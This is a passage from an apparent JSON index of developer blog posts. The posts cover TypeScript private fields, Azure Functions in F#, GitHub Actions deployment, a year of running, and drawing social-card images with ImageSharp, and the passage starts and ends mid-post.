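It's worth pausing on why this genuinely is private: the WeakMap lives in the module scope of the compiled file, so unless you hold a reference to it there's no way to look the value up, and because the key is the instance itself the entry can be garbage collected when the instance is. A quick sketch of the same idea in plain TypeScript (my own example, not the compiler output):

```typescript
// A module-scoped WeakMap keyed by the instance, mirroring what the compiler emits.
const secrets = new WeakMap<object, string>();

class Person {
  constructor(name: string) {
    secrets.set(this, name); // the value lives in the WeakMap, not on the instance
  }

  greet(): string {
    return `Hello, my name is ${secrets.get(this)}!`;
  }
}

const p = new Person("Aaron");
console.log(p.greet());      // Hello, my name is Aaron!
console.log(Object.keys(p)); // [] - nothing on the object itself to poke at
```

Back to what the compiler generates.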
Now, if we were to give the field an initial value like this:\n1 2 class Person { #name: string = ""; It’s change the generated code to use _name.set(this, "");. Next it uses one of the generated functions, __classPrivateFieldSet, which does what you’d guess from the name, sets the value in the WeakMap for the current instance of the class to the value provided (it does some error checking too). Then when we want to access the value the __classPrivateFieldGet function is used to get the value back out of the WeakMap that contains it.\nSomething I also noticed when playing around is that if you were to add another private field:\n1 2 3 4 5 6 7 8 9 10 11 12 13 class Person { #name: string = ""; #age: number; constructor(name: string, age: number) { this.#name = name; this.#age = age; } greet() { console.log(`Hello, my name is ${this.#name} and I'm ${this.#age} years old!`); } } The generated code now looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 var _name, _age; class Person { constructor(name, age) { _name.set(this, ""); _age.set(this, void 0); __classPrivateFieldSet(this, _name, name); __classPrivateFieldSet(this, _age, age); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet( this, _name )} and I'm ${__classPrivateFieldGet(this, _age)} years old!` ); } } _name = new WeakMap(), _age = new WeakMap(); We’ve got two WeakMap’s, one for each of the fields.\nSummary TypeScripts use of the WeakMap and the instance of the class as the key is quite an ingenious one when it comes to doing private fields for a class, but I do wonder what the trade off would be in memory consumption, since every class will name n number of WeakMap instances, and do they take up much memory to the point it could be impactful?\nNone the less it does give me ideas for when I’m building applications and I want to have restricted access to parts of a type, using a WeakMap as a store might just do the trick.\n", "id": "2020-01-23-typescript-ecmascript-class-private-fields" }, { "title": "12 Months at Microsoft", "url": "https://www.aaron-powell.com/posts/2020-01-22-12-months-at-microsoft/", "date": "Wed, 22 Jan 2020 09:30:56 +1100", "tags": [ "career", "microsoft" ], "description": "Has it been that long already!", "content": "At the beginning for last year I joined Microsoft in the Cloud Advocates team and given it’s been around 12 months I wanted to do an update on my 6 months at Microsoft post.\nOver the 6 months since the last post things have settled down into a bit more of a routine. I wrote 34 articles since that one and writing is still the primary way in which I like to produce content. But whereas in the first 6 months at Microsoft I focused on ticking off a few things I’d been wanting to learn (like IoT and Golang) recently I’ve been going back more to my roots and focusing on content around JavaScript and .NET (particularly F#).\nI also spent a bit more time at events, and that is partially due to the back half of a year being event season in Australia. And while I might not have had the best success getting accepted I got myself to events across Melbourne, Sydney, Perth and Orlando (which is a grueling 24 hours transit each way).\nThe Only Constant is Change I joked at the end of my 6 months post that I’d survived my first reorg and maybe that was just foreshadowing as before 12 months was up I’d survived a second one! 
🤣 (I’ve also had 4 manager changes in 12 months!)\nBut it’s not overly surprising: the CA team has just crossed the three-year milestone, which means the original three-year plan (like most companies, we operate on three-year plans) has wrapped up and it’s time to look at how to drive the next three years.\nWhen I joined I was a Regional Cloud Advocate, meaning my focus was on the communities in Australia regardless of technology. This was a challenge because we had to be able to speak to a lot of technologies we didn’t necessarily have experience in, and we all naturally tended to drift towards the communities that aligned with our skill sets anyway. So a shift was made: we’re now focused on particular technology verticals, which for me are JavaScript and .NET, with a focus beyond just our region (although I want to keep focusing on the Australian communities anyway, because at the very least it means a lot less travel!).\nThe Next 12 Months If I were to make a guess at what the next 12 months looks like, I’m pretty sure I’d be wrong about it! Ultimately, the high-level goals are still the same: engage with development communities to work out what they need to keep growing and thriving. I have a busy travel schedule already planned out, so you can see where I’ll be by looking at my talks calendar, and I’m working on some internal projects that hopefully I can share soon.\nAs always, I’m contactable if you want to learn more about what I do and how we as the CA team can help technical communities.\nUntil the next reorg! 🤣\n", "id": "2020-01-22-12-months-at-microsoft" }, { "title": "Creating Azure Functions in F#", "url": "https://www.aaron-powell.com/posts/2020-01-13-creating-azure-functions-in-fsharp/", "date": "Mon, 13 Jan 2020 09:03:42 +1100", "tags": [ "fsharp", "serverless", "azure-functions" ], "description": "Here's how to create Azure Functions in F# easily.", "content": "Last year I wrote a blog post on getting started with Azure Functions using F#. Sadly, it was a bit cumbersome as you needed to create a C# project and then convert it, and that was mainly so you got the right properties in the config file.\nThankfully this has been improved, as there are now F# templates for Azure Functions! Let’s have a quick look at how to get started with them.\nGetting The Templates Before getting started you’ll want to make sure you have the latest templates installed, so you have the latest NuGet packages referenced.
To do that install the templates packages from NuGet, Microsoft.Azure.WebJobs.ProjectTemplates and Microsoft.Azure.WebJobs.ItemTemplates:\n$> dotnet new --install Microsoft.Azure.WebJobs.ItemTemplates $> dotnet new --install Microsoft.Azure.WebJobs.ProjectTemplates Installing these templates will add a bunch of new options to dotnet new for both C# and F#:\nTemplates Short Name Language Tags ------------------------------------------------------------------------------------------------------------------------------------------- DurableFunctionsOrchestration durable [C#] Azure Function/Durable Functions Orchestration SendGrid sendgrid [C#] Azure Function/Ouput/SendGrid BlobTrigger blob [C#], F# Azure Function/Trigger/Blob CosmosDBTrigger cosmos [C#], F# Azure Function/Trigger/Cosmos DB EventGridTrigger eventgrid [C#] Azure Function/Trigger/EventGrid EventHubTrigger eventhub [C#], F# Azure Function/Trigger/EventHub HttpTrigger http [C#], F# Azure Function/Trigger/Http IotHubTrigger iothub [C#] Azure Function/Trigger/IotHub ServiceBusQueueTrigger squeue [C#] Azure Function/Trigger/Service Bus/Queue ServiceBusTopicTrigger stopic [C#] Azure Function/Trigger/Service Bus/Topic QueueTrigger queue [C#] Azure Function/Trigger/Storage Queue TimerTrigger timer [C#], F# Azure Function/Trigger/Timer Azure Functions func [C#], F# Azure Functions/Solution Not all the triggers have an F# template provided, but there’s a number of good ones to get started with.\nCreating Our Solution With the templates installed we can create them from the CLI just like any other .NET project. Let’s start by creating a Functions solution:\n$> dotnet new func --language F# --name FunctionsInFSharp You’ll receive a success message and if we look on disk the files will be like so:\n$> ls FunctionsInFSharp.fsproj host.json local.settings.json Woo, we have our fsproj and ready to go with the right NuGet packages referenced.\nCreating a Function Finally, we want to create our Function itself, and again that’s something we can do from the .NET CLI:\n$> dotnet new http --language F# --name HttpTrigger This will create us a new file called HttpTrigger.fs alongside the project file using the http template (for a HttpTrigger function). Since F# needs the files to include in compilation to be in the fsproj file, make sure you pop open the fsproj file and include it within an <ItemGroup>:\n1 <Compile Include="HttpTrigger.fs" /> Now if you open this in VS Code it’ll be detected as a Azure Functions project and prompt you to setup the VS Code Extension and artifacts, then it’s a matter of hitting F5 to launch!\nConclusion There we have it folks, a much simpler way to create an F# Azure Function using the provided templates. No more remembering what NuGet packages to reference, renaming of csproj files or working out what additional properties are needed in the project file to make one from scratch.\nHappy F#‘ing!\n", "id": "2020-01-13-creating-azure-functions-in-fsharp" }, { "title": "Deploying Azure Functions With Github Actions", "url": "https://www.aaron-powell.com/posts/2020-01-10-deploying-azure-functions-with-github-actions/", "date": "Fri, 10 Jan 2020 13:34:00 +1100", "tags": [ "serverless", "azure-functions", "devops", "azure" ], "description": "Looking to deploy Azure Functions with GitHub Actions? Here's how to get started.", "content": "When I was creating my Azure Functions to generate social images I decided to give GitHub Actions a spin as the deployment tool, after all, I quite liked them when I updated my blog. 
So let’s have a look at how to use GitHub Actions to deploy Azure Function.\nThere’s a lot of context and terminology on getting started with GitHub Actions in my other blog post that I’d encourage you to read first if you’re new to GitHub Actions, since I won’t cover it all in detail here.\nSetting Up Our Action We’ll start by creating our GitHub Action file at .github/workflows/devops-workflow.yml in our git repo:\n1 2 3 4 5 6 7 8 9 10 11 name: Build and Deploy env: OUTPUT_PATH: ${{ github.workspace }}/.output DOTNET_VERSION: "3.1.100" on: push: branches: - master jobs: We’ll use some environment variables for the output and .NET version (since the Functions in my image generator are .NET Functions, but you don’t need that if they are non-.NET that you’re using) and specify that this workflow will only run when code is pushed to the master branch.\nThe Build Job If it’s a .NET Function we’ll need to compile it, if it’s Node.js install the npm packages, use pip if it’s Python and Maven for Java. This is what the role of the Build job will handle, preparing the assets we need to deploy to Azure, so let’s create a Build job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 build: runs-on: ubuntu-latest steps: - name: "Checkout" uses: actions/checkout@master - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Publish functions run: dotnet publish --configuration Release --output ${{ env.OUTPUT_PATH }} This will use the actions/setup-dotnet@v1 Action from the marketplace to install the right version of .NET (based on our environment variable) and use the .NET CLI to publish the output.\nNow it’s time to package the output for the deployment job:\n1 2 3 4 5 - name: Package functions uses: actions/upload-artifact@v1 with: name: functions path: ${{ env.OUTPUT_PATH }} Tada 🎉! You have an artifact for the Functions, ready to be deployed.\nThe Deployment Job 1 2 3 4 5 deploy: runs-on: ubuntu-latest needs: [build] env: FUNC_APP_NAME: blogimagegenerator Since the deploy job will need the artifacts from the build job we’ll set it up as a dependency using the needs: [build], otherwise we’d deploy before the Functions were built, and that’s not going to work!\n1 2 3 4 5 6 7 8 9 10 11 steps: - name: Download website uses: actions/download-artifact@v1 with: name: functions path: ${{ env.OUTPUT_PATH }} - name: "Login via Azure CLI" uses: azure/login@v1 with: creds: ${{ secrets.AZURE_CREDENTIALS }} Using the actions/download-artifact@v1 we can get the output from the build job and then it’s time to log in to Azure using the credentials we’d previously generated (see my last blog post for information about that).\nThe last piece of the puzzle is to use the Azure/functions-action@v1 GitHub Action from the marketplace:\n1 2 3 4 5 - name: "Run Azure Functions Action" uses: Azure/functions-action@v1 with: app-name: ${{ env.FUNC_APP_NAME }} package: ${{ env.OUTPUT_PATH }} This requires the name of the Function App that we’re deploying into to be provided as the app-name parameter (we’ve stored it in an environment variable named FUNC_APP_NAME).\nAnd with that the workflow is complete, ready to deploy your Functions to Azure. 
You can find the full file on my GitHub along with a recent run if you’re curious on the output.\nConclusion With only 53 lines we can create a GitHub Action that will deploy Azure Functions each time we push to a branch, which I think is pretty simple.\nI’ve covered off how to do it with a .NET Function, but if you want to check out how to do it with other languages head on over to the Azure Function docs.\n", "id": "2020-01-10-deploying-azure-functions-with-github-actions" }, { "title": "1,000km", "url": "https://www.aaron-powell.com/posts/2020-01-06-1000km/", "date": "Mon, 06 Jan 2020 07:47:18 +1100", "tags": [ "running" ], "description": "A story of my running in 2019.", "content": "I like to run, it’s my exercise, my escape. I’ve tried gym programs, had weights at home, stuff like that but I’ve never gotten into it like running.\nGrowing up I played field hockey so I’ve always had decent cardio fitness and would sometimes go for a run around the block for some extra training. Then, about 6 years ago my wife started a fitness program and go into running so I joined in and she introduced me to an event she’d learnt about, parkrun. For those unfamiliar with parkrun it’s a free, timed 5km event that happens every weekend in parks all around the world (it originated in England). It’s not a race, the only person you’re trying to beat is yourself. When you finish your run, or walk, you scan your barcode and get a time for the day.\nSo parkrun is part of mine and my wife’s weekly ritual, we get up on Saturday morning and head to our local parkrun and run it (now we run it pushing a pram). When we’re traveling over a weekend we’ll try and find a parkrun that one of us can get to; like the time I was in Copenhagen on a family holiday and left my wife and kids at our Airbnb while I cycled ~7km to a random park to do parkrun (and then had to cycle back)!\nBy and large, this was my exercise, occasionally I’d sign up for a half marathon and thus increase my running distance and frequency (but never as much as I probably should have and that’d annoy my wife when I’d “just run it” in a decent time anyway 😛) but then I’d taper off again.\nComing into 2019 I decided I wanted to put a bit more effort into my running. Over the years I’ve run I’ve talked to different people about goals and one that’s come up is the 1,000km goal, running 1,000km in 12 months. So I decided a distance goal would be what I wanted for 2019 but given that in 2018 I’d only done a touch over 400km 1,000km seemed a bit ambitious, thus I settled on a more obtainable goal of 750km.\nEven still, 750km seems like a lot of distance to cover in a year until you start breaking it down. To do it you need to run 15km per week, over 50 weeks, leaving 2 weeks for illness/injury/travelling/etc.\nNow it’s starting to look obtainable. I already run 5km per week at parkrun and at the end of 2018 I’d rejoined some friends I use to run with for a weekly Wednesday that alternates between intervals or hills which nets 8km or 7km, depending on the week. Conservatively I’m already at 12km for the week so if I run to my nearest parkrun, which is 3km away, that’s 15km for the week done!\nAfter a few weeks I was feeling good and 2 runs a week no longer felt like “enough”, I was itching for another run and to increase my distance.\nAt this point I was averaging around the 17km per week as I figured it’d be better to bank a few km’s in case I got injured but I started to think that maybe 1,000km was possible.\nOk, back to the maths. 
To do 1,000km you need to run 20km per week average (leaving the same 2-week buffer) which would mean that I’d have to start running more than 20km to make up for the deficit I already had. I started to push 23km - 25km per week by throwing in an extra run or two.\nAnd then, on the 21st December, I jogged to parkrun so that when I hit the 4km mark I’d tick over 1,000km for 2019 (I’d needed to do 7km for the day I wanted to make sure I didn’t track a short course on the run)! I ended up finishing 2019 doing 1,023km across 164 runs in a total of 79.5 hours (according to Strava, and if it’s not on Strava, it didn’t count).\nMilestones, Pace and Injury This is the most I’ve run in a year by few hundred km’s and over double what I’d done the year prior so it was a bit of a learning experience and it did also result in me being able to achieve a few milestones.\nI finally beat my PB at my home parkrun, a PB that’d stood for about 5 years, by finally getting sub-20 minutes again (19:50 to be exact)! I also managed to get sub-20 at 5 other parkrun’s in 2019 (ok, one was New Years Day, but it totally counts), with a 5km PB now sitting at 19:30. I’m still pretty shocked at this and it’s going to be hard-pressed to top that many PB’s in a year again.\nI also got back into doing some races. With the arrival of our kids and a shift in priorities doing races was something that I’d dropped. It didn’t bother me that much, the last few times I’d done half marathons I’d not trained properly and ended up injured during the run and just slogging out the last ~5km which isn’t fun. But with my body feeling good and my running being consistent I picked a goal that I’d had for a while, sub-60 minutes City2Surf.\nIf you’re unfamiliar with City2Surf it’s a 14km run from Sydney’s CBD out to Bondi Beach and it’s Australia’s largest fun run with over 80,000 attendees. It’s a notoriously tough course and not just because of Heartbreak Hill (an approximately 2km uphill). I’ve run the event in the past, but not since our eldest was born, so my PB of 62:30 was 5 years ago. But now I’m training properly and I should be in a good place to tackle it.\nAbout 6 weeks out from the event I started to up my hill training and subsequently overloaded one of my achilles tendons and I was struggling to walk. After a few weeks of physio and slowly getting back into it I was able to start doing some hill work again but nowhere near what I was wanting to tackle and several weeks late. But, entry was paid for and damnit I was going to run.\nDay of the run I went in with a game plan, an idea on how I’d tackle the run to try and get my sub-60 minute time but it would be tough. Coming over the crest of Heartbreak Hill and knowing I was only halfway through I was spent. Mentally I resided to the fact that I wouldn’t do it but I was determined to not be slower than the last time I ran! Coming through the last few km’s I’d stopped looking at my watch, I could no longer do the maths to work out what time I’d need to hit each km to make it, but we were running downhill so I just went for it (cracking out a 3:40 min/km 13th km!) finishing in 59:23. 
I was destroyed as a result of it though, it was about 3 days before it stopped hurting to walk and I ended up with gastro (which sucks when it hurts to walk) but I think that was more from sheer exhaustion than anything.\nConclusion All in all, it was a good year, I hit my stretch goal, did 3 races, ruined 1 pair of shoes, had minimal injuries and got a bit faster overall.\nWhat I found was most helpful for this was being consistent in my running. Sure, there were mornings in winter where it was dark and cold but I was still out with some friends running by the light of head torches; there were nights where I hadn’t had much sleep due to sick kids, but I still dragged myself out of bed to run, complaining the whole time; there were days where my body was stiff but I’d use the run to shake it off.\nI’ll aim for the 1,000km again in 2020, I’m not ready to go beyond that… Yet. 😉\n", "id": "2020-01-06-1000km" }, { "title": "Generating Images with Azure Functions", "url": "https://www.aaron-powell.com/posts/2020-01-03-generating-images-with-azure-functions/", "date": "Fri, 03 Jan 2020 09:18:30 +1100", "tags": [ "fsharp", "serverless" ], "description": "How I created a little service to create social media images for my blog.", "content": "Since I converted my blog to a static website whenever posts were shared on social media, which I automatically do via my RSS feed, you’d see something like this in your timeline.\nIt looked no better in Slack.\nNow sure, I’m a handsome guy and that is a great photo if I do say so myself, but do you really need a massive picture of me to adorn a timeline? After all, it doesn’t do much to relate back to the post in question does it?\nSo when I decided to embark on the rebuilt of my website recently this was one of the things I wanted to fix was that.\nOpen Graph Protocol Before looking into how I do things better let’s just look at what we’re working with. When you share links on social sites such as Twitter, Facebook, LinkedIn, etc. they will look for some additional metadata on the page called the Open Graph Protocol. This protocol started its life in Facebook as a way to embed more information into the social graph that they generate around anything shared on the platform, but over time it’s become a bit of a defacto standard in social graph markup so other sites have adopted it.\nSpecifically the image comes from the <meta property="og:image" content="..." /> meta property, and there are a number of other meta properties that are useful to markup the social graph.\nSo when a link is shared the service will request the HTML, look for this metadata and if it exists, embed it in a “card” to make your link more appealing (at least, in theory).\nA Better Open Graph Image In my original theme the og:image was hard coded so that every page used the same image file, which I’m sure was fine for how the theme author intended the theme to be used, but in my usage of it, it was sub-optimal.\nI’ve been spending quite a bit of time on DEV this past year and one thing I like about it is that when you share a link there’s a really nice og:image.\nYou can also optionally upload an image to be the “cover image” which will become the og:image so it doesn’t use the generated card but something you can control.\nI decided that I wanted to try and replicate this, allow for me to control the og:image and if there isn’t one, generate a title card like DEV does.\nDynamic Static Images Everything I need for my website lives in the git repo, including all images. 
This does mean that the repo is getting larger over time as I blog more and add more rich media to the posts, so I wanted to be careful about how I added these new og:image images. I also didn’t want to make the build pipeline more complex, I think my GitHub Actions process is really quite slick, so I decided that I’d make an API endpoint to generate the images for me, or return a previously generated one, so let’s take a look at how to do that.\nGenerating Images in .NET I decided I’d create an Azure Function in F# to handle this problem and to generate the images I’d use the open source ImageSharp library (I’ve used the 1.0.0-beta0009 and 1.0.0-beta0007 packages which are the latest across a few of the dependencies I needed at the time of writing).\nImageSharp is a very low-level image manipulation library and can be used to work with existing images allowing you to edit, crop, transform, etc. but in this post we’re going to create the image entirely via code as it gives us the flexibility to tweak it over time.\nBuilding Our Function Let’s start by defining a HTTP Trigger Function and combine it with a Blob input binding that will give access to the previously generated image (if there is one). The HTTP binding will have an ID for the post we’re generating the image for:\n1 2 3 4 5 6 module BlogCardGenerator = [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = NotFoundResult() With the scaffolding in place, let’s start building our image generator!\nLimiting Abuse We’re creating an unsecured API endpoint that allows people to provide a bit of data to via a GET request which will generate an image that is stored in storage. This doesn’t sound like the kind of thing that could be abused does it… Since the og:image URL needs to be unsecured we needed to think of a creative way to validate that what is being requested is actually for a post on my blog. But since it’s all markdown files in GitHub how can we validate that?\nIt turns out that that isn’t too hard thanks to the work done to create my search app. For this to work we generate a JSON file that is deployed as part of my website (although it doesn’t need to be anymore, but I’m just too lazy to exclude it), so my website has a list of all posts in JSON (there also exists a list in XML which is the RSS output that could be used instead) and that’s what we can use to validate against.\nAlso, the advantage of having this “database” available is that we don’t need to pass anything more than an ID to the post in the API call, since all the metadata is in the JSON file anyway.\nWe’ll use the JSON Type Provider to create a strongly typed way of accessing the blog posts. 
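If you haven’t come across type providers before, the general shape of the pattern looks roughly like this (a throwaway sketch using made-up sample JSON, not the blog’s actual schema):

// Illustrative only: FSharp.Data's JsonProvider infers a type from a sample,
// so the People type and its properties come from the made-up JSON below.
open FSharp.Data

type People = JsonProvider<""" { "people": [{ "name": "Aaron", "tags": ["fsharp"] }] } """>

let names =
    People.GetSample().People
    |> Array.map (fun person -> person.Name)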
In a new file called RequestValidator.fs we’ll create the module:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 module RequestValidator open FSharp.Data [<Literal>] let JsonExample = """ { "posts": [{ "title": "Post Title", "date": "Tue, 17 Dec 2019 08:50:14 +1100", "tags": ["tag", "tag2"], "id": "Test" }] } """ type Blog = JsonProvider<JsonExample> let getBlogMetadata() = Blog.AsyncLoad "https://www.aaron-powell.com/index.json" let tryFindPost (id: string) (blogs: Blog.Post array) = blogs |> Array.tryFind (fun blog -> blog.Id = id) A string represents the structure of the JSON (so the Type Provider knows what types to generate) and then two functions are exposed from the module, getBlogMetadata which downloads the JSON using the Type Provider to give us the object graph and tryFindPost which will return an Option when matching the blog by the provided ID.\nTime to incorporate this into the Function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> return OkResult() :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask Since getBlogMetadata is an async function we have wrapped the function in an async computation expression and used let! to invoke the method. But the Functions host doesn’t understand the F# async API so we have to convert it back to a Task, and that’s done with Async.StartAsTask. Once the metadata is downloaded it’s converted into the object structure we expect and our tryFindPost method is called with a match expression to either go does a happy path Some post or an unhappy path None, with the latter to be used when the API is being called by someone trying to be tricky. Lastly, we have to cast the result to a common base type, which IActionResult is ideal for, as F# doesn’t do implicit casting, so we have to ensure that every return is returning the same type.\nChecking Image Cache We don’t want to generate the images every time, it’d be much more preferable to only generate the images once and then future requests can use that image. This is where the Blob input binding comes in. To use this binding we need to provide it with:\nThe name of the Blob to bind to (title-cards/{id}.png) This can use a binding expression that’s shared with the Trigger action, so in this case we can use the ID that comes in on the HTTP trigger on the Blob binding Access Mode, in our case we need it to be FileAccess.ReadWrite The name of the connection string This is optional, it’ll use the storage account of the Function if not provided This is then bound to a type of ICloudBlob which gives us an API to query information about the Blob as well as grab a copy or upload to it, think of it as a proxy container.\nSince the Blob might not exist though we need to check that first, and if it does, send it in the response, otherwise we’ll generate a new image.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 let downloadImage (postImage: ICloudBlob) = async { let ms = new MemoryStream() do! 
postImage.DownloadToStreamAsync ms |> Async.AwaitTask ms.Position <- int64 0 return ms } [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> let! exists = postImage.ExistsAsync() |> Async.AwaitTask if exists then log.LogInformation "Image existed" let! ms = downloadImage postImage return FileStreamResult(ms, "image/png") :> IActionResult else // todo: generate image return OkResult() :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask On line 19 we use ExistsAsync on the ICloudBlob to see if the blob we’ve requested from storage exists already and if it does the downloadImage function creates a new MemoryStream that the ICloudBlob will be streamed into using the DownloadToStringAsync function so that we can return the stream in the FileStreamResult on line 24 (on line 5 we reset the stream position to 0 so the response can read it). If it doesn’t exist, we’ll need to create the image using ImageSharp.\nCreating Our Image We’ve made a request for an image but it turns on that it doesn’t exist yet, guess we’d better try and generate one, but how do we go about doing that? First, we need to think about what the image we want to generate looks like. Let’s look back at the DEV image we want to replicate:\nIt’s a rectangle with rounded corners top left and right, a drop shadow, the title of the post with the author’s name below in slightly smaller font and some other little images. I’m going to ditch the avatar of myself (useful on DEV since many people blog, but not on my site) and I’m going to ditch the icons since I’m lazy.\nDrawing A Box With Rounded Corners Seems like a pretty straight forward requirement, draw a box with two rounded corners, but of course it wont be that simple. To do this with ImageSharp we’ll use the SixLabors.Shapes NuGet package (1.0.0-beta0009 version at the time of writing) as it gives us some primitives to work with such as RectangularPolygon and EllipsePolygon.\nThe reason that we’ll need these two types is that a box with rounded corners isn’t a primitive shape, those are rectangles (or squares if the height and width match), ellipse (or a circle if the height and width match), lines, triangles, things like that. This means we’ll need to get tricky and layer a few shapes on top of each other.\nThis image shows what we’re going to have to create and I’ve coloured each of the main components. 
In our solution we’ll colour them the same, but this helps understand the problem.\nLet’s create a new file called ImageCreator.fs and start scaffolding out how we’ll make the box (I’ll omit the open statements for brevity):\n1 2 3 4 module ImageCreator let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = image There’s a lot of arguments to this function, some of them are self explanatory (width, height, colour) and then there’s some like image which is the drawing canvas from ImageSharp.\nNow we can draw what I call the “inner box”, which is the yellow one from the image above, and this is skinnier than the full box by the radius of the rounded corner.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate (fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) image With ImageSharp we use a Mutate function on the Image object which we provide a function that takes a IImageProcessingContext (called ctx in the above snippet) that we can manipulate the image from. Because ImageSharp is designed for C# it’s a bit clunky to work with in F# due to the chained API and that F# does implicit returns not explicit like C#, so we’ll use a lot of |> ignore pipes.\nFrom the ctx we will call Fill and provide GraphicsOptions (which we can control the antialiasing of the image) and the colour, then we can start to draw on the canvas with something, in this case, a RectangularPolygon. For the generated image let’s set a 20px gutter around it, so we start the rectangle at the coordinates 30x 30y so that we can have a 10px rounded corner that sits above this box. This is because if the box started at the same x/y as the rounded corner you’d see the corner of the box poking through underneath, so it has to have a slight offset. If you wanted a more dynamic corner sizing then you might pass in the radius of the circle and calculate the x/y offset. 
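As a rough sketch of that idea (not something from the post itself), the radius could become a parameter and the start offsets get derived from it; generateBoxWithRadius is a hypothetical name:

// Hypothetical variant where the corner radius is an argument rather than
// the module-level constant; the start offsets are derived from it.
// (Only the inner box is shown; the circles and fillers would get the same treatment.)
let generateBoxWithRadius (colour: Color) (radius: float32) (width: float32) (height: float32) (image: Image<Rgba32>) =
    let xStart = gutter + radius
    let yStart = gutter + radius
    image.Mutate(fun ctx ->
        ctx.Fill
            (GraphicsOptions(true),
             colour,
             RectangularPolygon(xStart, yStart, width - xStart - gutter - radius, height - yStart - gutter))
        |> ignore)
    image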
Next we need the height and width of the rectangle; height is simple, it’s the total canvas height (height) less our gutter (20px) less the y starting position (30px), so height - gutter - yStart; width is similar, except we also need to subtract the corner radius, so it is width - xStart - gutter - cornerRadius.\nCongratulations, you’ve drawn a rectangle!\nNow it’s time to add our rounded corners, which we’ll do by creating some circles.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill(GraphicsOptions(true), colour, EllipsePolygon(xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) image We’re now using EllipsePolygon to generate a an ellipse with an equal width and height to make it a circle not an oval, and we’ll do it twice, one for each corner. We provide an x & y position for the centre of the ellipse, rather than the top-left corner like a rectangle, so that width and height can be appropriately applied. For our left corner we’ll use the same xStart and yStart to draw outwards from and then specify the height and width is double the radius, since these values represent the diameter. With the circles drawn our image will look like this:\nAwesome! 
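To make the positioning concrete, here’s how the numbers fall out if we assume a hypothetical 800px wide canvas (the 800 is purely illustrative, not a value from the post):

// Purely illustrative arithmetic with gutter = 20 and cornerRadius = 10.
let width = 800.f
let xStart = gutter + cornerRadius                          // 30
let innerBoxWidth = width - xStart - gutter - cornerRadius  // 740, so the box runs from x = 30 to x = 770
// left-top circle:  centre (30, 30), diameter 20, so it spans x = 20..40
// right-top circle: centre (770, 30), diameter 20, so it spans x = 760..780
// both leave the 20px gutter untouched at the edges of the canvas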
Now all we need to do is fill in the gaps between the circles and the inner box then everything should be set!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 module ImageCreator let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(xStart, yStart, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill(GraphicsOptions(true), colour, EllipsePolygon(xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart, yStart, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // left gutter image.Mutate (fun ctx -> ctx.Fill(GraphicsOptions(true), colour, RectangularPolygon(gutter, yStart, cornerRadius, height - yStart - gutter)) |> ignore) // right gutter image.Mutate (fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(width - xStart, yStart, cornerRadius, height - yStart - gutter)) |> ignore) // top gutter image.Mutate (fun ctx -> ctx.Fill(GraphicsOptions(true), colour, 